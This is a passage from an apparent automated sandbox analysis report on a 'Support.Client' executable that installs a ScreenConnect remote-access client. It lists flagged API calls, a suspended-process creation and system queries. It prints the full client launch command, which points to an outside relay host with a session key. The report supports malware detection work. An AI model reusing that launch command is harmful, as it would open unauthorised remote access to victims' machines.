Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 320

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\2p970bck.dl9\b46mr3kj.37l\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\2p970bck.dl9\b46mr3kj.37l\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\2p970bck.dl9\b46mr3kj.37l\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"	Jump to behavior

Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00421BD4 cpuid

0_2_00421BD4

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
